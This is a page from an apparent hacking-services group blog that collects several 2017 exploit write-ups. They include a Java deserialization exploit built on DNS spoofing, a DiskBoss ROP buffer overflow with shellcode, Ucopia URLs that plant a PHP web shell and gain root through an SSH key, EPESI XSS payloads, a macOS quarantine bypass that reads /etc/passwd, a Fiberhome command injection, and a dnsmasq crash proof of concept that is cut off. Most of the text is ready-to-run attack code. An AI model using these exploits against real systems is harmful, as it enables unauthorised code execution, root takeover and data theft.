# Exploit Title: ERS Data System 1.8.1 Deserialize Vulnerability
# Google Dork: N/A
# Date: 9/21/2017
# Exploit Author: West Shepherd
# Vendor Homepage: http://www.ersdata.com
# Software Link: www.ersdata.com/downloads/ErsSetup.exe
# Version: 1.8.1.0
# Tested on: Windows 7 x86
# CVE : CVE-2017-14702
# Description:
# ERS Data System 1.8.1.0 allows remote attackers to execute arbitrary code, related to the use of
# com.branaghgroup.ecers.update.UpdateRequest deserialization.
# Exploitaiton:
# The ERS Data System thick client connects to the www.ersdata.com API via an unencrypted HTTP connection on TCP port 3311.
# To redirect requests from the thick client to the attacking machine, enable packet forwarding:
#!/bin/bash
#echo 1 > /proc/sys/net/ipv4/ip_forward
#iptables -F INPUT
#iptables -F FORWARD
#iptables -F OUTPUT
#iptables -F -t nat
#iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
#iptables -t nat -A POSTROUTING -s 192.168.85.0/24 ! -d 192.168.85.0/24 -j MASQUERADE
#iptables -P INPUT ACCEPT
#iptables -P FORWARD ACCEPT
#iptables -P OUTPUT ACCEPT
# Then poison DNS requests to the www.ersdata.com domain:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example:
#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self,req,client_addr,server):
SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)
def do_POST(self):
# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(response))
self.end_headers()
self.wfile.write(response)
try:
httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
print "Serving at port: ", 3311
httpd.serve_forever()
except:
print "Exiting..."
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863580809
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: C4t0ps1s
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
# Date: 03-10-2017
# Twitter: @C4t0ps1s
# Email: C4t0ps1s@gmail.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 10 x64
#
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
#
# To reproduce the code execution:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
#
#========================================================================================================================
import struct
buff = "a"*1312
#push esp | pop esi | retn 4
buff += struct.pack("<L",0x65247445)
#mov eax, esi | pop esi | retn 4
buff += struct.pack("<L",0x65273f24)
buff += "PADD"
buff += "PADD"
#pop ebx | retn
buff += struct.pack("<L",0x65222936)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += struct.pack("<L",0x0101015a)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
#jmp eax
buff += struct.pack("<L",0x65217d28)
#inc eax
buff += "\x40"*20
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
buff += sc
f = open("shareName.txt","wb")
f.write(buff)
f.close()
# Exploit Title: Unauthenticated remote root code execution on captive
portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27
# Exploit Title: Multiple Stored XSS in EPESI
# Date: 10/03/2017
# Exploit Author: Zeeshan Shaikh
# Vendor Homepage: http://epe.si/
# Software Link: http://epe.si/download/
# Version: 1.8.2 rev20170830
# CVE : CVE-2017-14712 to CVE-2017-14717
# Category: webapps
XSS 1 (Tasks - Title)
Steps to recreate:
1. Home->Tasks->add new
2. Enter title as "MYTITLE" and fill required details but don't click save
3. Start interceptor and intercept request
4. click save
5. Now replace MYTITLE with "<i onclick=alert(1)>alertme</i>"(without
quotes)
6. Home->click on alertme
XSS 2 (Tasks - Description)
Steps to recreate:
1. Create a new task and fill description as "MYDESC" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYDESC with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 3 (Tasks/Phonecall - Notes - Title)
Steps to recreate:
1. Home->Tasks/PhoneCall->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in notes section
XSS 4 (Tasks - Alerts - Title)
Steps to recreate:
1. Home->Tasks->Notes->add new
2. Steps same as XSS 1
3. Click on alertme in alerts section
XSS 5 (Phonecalls - Subject)
Steps to recreate:
1. Create a new phonecall and fill subject as "MYSUB" but don't click on
save
2. Start intercepting request and then click save on browser
3. Now replace MYSUB with "<script>alert(1)</script>"
4. Go to Home(make sure task applet is there) -> Mouseover on i icon
XSS 6 (Phonecalls - Description)
Same as XSS 5
Title: Mac OS X Local Javascript Quarantine Bypass
Product: Mac OS X
Version: 10.12, 10.11, 10.10 and probably prior
Vendor: apple.com <http://apple.com/>
Type: DOM Based XSS
Risk level: 3 / 5
Credits: filippo.cavallarin@wearesegment.com <mailto:filippo.cavallarin@wearesegment.com>
CVE: N/A
Vendor notification: 2017-07-15
Vendor fix: 2017-09-25
Public disclosure: 2017-09-28
DETAILS
Mac OS X contains a vulnerability that allows the bypass of the Apple Quarantine and the execution of arbitrary
Javascript code without restrictions.
Basically, Apple's Quarantine works by setting an extended attribute to downloaded files (and also to files
extracted from downloaded archive/image) that tells the system to open/execute those files in a restricted
environment. For example, a quarantined html file won't be able to load local resources.
The vulnerability is in one html file, part of the Mac OS X core, that is prone to a DOM Based XSS allowing the
excution of arbitrary javascript commands in its (unrestricted) context.
The mentioned file is located at /System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html
and contains the following code:
<script type="text/javascript" charset="utf-8">
setBasePathFromString(urlParam("rhtml"));
loadLocStrings();
loadJavascriptLibs();
function init () { /* <-- called by <body onload="init()" */
[...]
rHTMLPath = urlParam("rhtml"); /* <-- takes 'rhtml' parameters from current url */
[...]
self.contentHttpReq.open('GET', rHTMLPath, true);
self.contentHttpReq.onreadystatechange = function() {
if (self.contentHttpReq.readyState == 4) {
loadTutorial(self.contentHttpReq.responseText);
}
}
[...]
}
function loadTutorial(response) {
var rHTMLPath = urlParam("rhtml");
// this will create a tutorialData item
eval(response);
[...]
}
function loadLocStrings()
{
var headID = document.getElementsByTagName("head")[0];
var rHTMLPath = urlParam("rhtml");
rHTMLPath = rHTMLPath.replace("metaData.html", "localizedStrings.js");
var newScript = document.createElement('script');
newScript.type = 'text/javascript';
newScript.src = rHTMLPath;
headID.appendChild(newScript);
}
[...]
</script>
In short, it takes an url from the "rhtml" query string parameter, makes a request to that url and evaluates
the response content as javascript code.
The code below contains two different DOM Based XSS.
The first is in the loadLocStrings() function that creates a SCRIPT element and uses the "rhtml" parameter as
its "src" property.
The second is in the init() function that uses the "rhtml" parameter to make an ajax call and then passes the
response directly to eval().
As the result the same payload is executed twice.
An attacker, by providing a data uri, can take control of the response and thus what gets evaluated.
One possile vector of exploitation are the .webloc files. Basically those files contain an url and they simply loads
it in Safari when opened.
By crafting a .webloc file and by tricking a victim to open it, an attacker can run privileged javascript commands on
the victim's computer.
Due to the fact that .webloc files also use an extended attribute to store data, they must be sent contained in a tar
archive (or any other format that supports extended attributes).
PROOF OF CONCEPT
To reproduce the issue follow the steps below:
1. create a javascript file you want to execute on your target
2. convert its content to base64
3. encode it to a "uri component" (ex with encodeURIComponent js function)
4. use it to build a data uri as follow:
data:text/plain;base64,<urlencoded base64>
5. prepend the following string to it:
file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>
6. open it with Safari
7. save it as a bookmark
8. drag the bookmark to the Finder (a .webloc file is created, if the extension is not .webloc, rename it)
9. create a tar archive containing the .webloc file
10. send it to the victim
Note that due to the behaviour of rhtmlPlayer.html, in order to access local resources, the first line of the
javascript code must be: document.getElementsByTagName("base")[0].href="";
The following bash script will take a javascript file and converts it to final "file" url:
BOF
#!/bin/bash
BASEURL="file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml= <file:///System/Library/CoreServices/HelpViewer.app/Contents/Resources/rhtmlPlayer.html?rhtml=>"
BASEJS="(function(){document.getElementsByTagName('base')[0].href='';if('_' in window)return;window._=1;"
DATAURI="data:text/plain;base64,"
JSFILE=$1
if [ "$JSFILE" = "" ]; then
echo "usage: $0 <jsfile>"
exit 1
fi
JS=$BASEJS`cat $JSFILE`"})();"
ENCJS=`echo -n $JS | base64 | sed 's/=/%3D/g' | sed 's/+/%2F/g' | sed 's/\//%2B/g'`
URL="$BASEURL""$DATAURI""$ENCJS"
echo -ne "Paste the url below into Safari's url bar:\n\033[33m$URL\033[0m\n"
EOF
The following javascript code will alert the /etc/passwd file on the victim's computer:
BOF
xhr = new XMLHttpRequest();
xhr.open("GET", "/etc/passwd", true);
xhr.onreadystatechange = function(){
if (xhr.readyState == 4) {
alert(xhr.responseText);
}
};
xhr.send();
EOF
Note that only Safari will successfully load local resources via ajax (Chrome and Firefox won't). In this
exploitation process it's not an issue since .webloc files are always opened with Safari.
NOTE
This issue has been silently fixed in Mac OS X High Sierra and (at time of writing) there is no mention of this
bug in Apple's changelog.
No CVE has been assigned by Apple.
SOLUTION
Upgrade to Mac OS X High Sierra or simply remove rhtmlPlayer.html.
Safari 11 (available for Mac OS X 10.11, 10.12 and 10.13) introduces the following security henancement:
"CORS and cross origin access from file:// are now blocked unless Disable Local File Restrictions is selected from the Develop menu"
hence the above exploit will not work against updated versions of OSX El Capitan and Sierra. However javascript execution outside quarantine is still possible.
REFERENCES
https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html <https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html>
DISCLOSURE
This vulnerability has been disclosed thru Securiteam Secure Disclosure program: http://www.beyondsecurity.com/ssd <http://www.beyondsecurity.com/ssd>
# Exploit Title: Fiberhome an5506-04-f – -PING- COMMAND INJECTION
# Date: 03.10.2017
# Exploit Author: Tauco
# Vendor Homepage: http://hk.fiberhomegroup.com
# Version: RP2609
# Tested on: Windows 10
Description:
===========================================================================
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
https://www.owasp.org/index.php/Command_Injection
Proof of Concepts :
=======================================
1. Go to the Default Gateway
2. Open the application
3. Open diagnosis
4. Input command to the Destination Address
5. Click Ping
ping_ip=127.0.0.1;whoami;id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.617 ms
64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.259 ms
64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.215 ms
64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.214 ms
64 bytes from 127.0.0.1: seq=4 ttl=64 time=0.218 ms
--- 127.0.0.1 ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 0.214/0.304/0.617 ms
root
uid=0(root) gid=0 groups=0
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
#0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
#1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
#2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
#3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
#4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
#5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
#6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
#7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
#8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
#0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
#1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
#2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
#3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <fjserna@google.com>
# Felix Wilhelm <fwilhelm@google.com>
# Gabriel Campana <gbrl@google.com>
# Kevin Hamacher <hamacher@google.com>
# Gynvael Coldwin <gynvael@google.com>
# Ron Bowes - Xoogler :/
import socket
import sys
def negative_size_param():
data = '''00 00 00 00 00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00 00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01 00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08 08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00 00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00 00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d 06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00 29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00 00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08 08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29 fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9 00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00 00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6 00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
return data
if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)
ip = sys.argv[1]
port = int(sys.argv[2])
packet = negative_size_param()
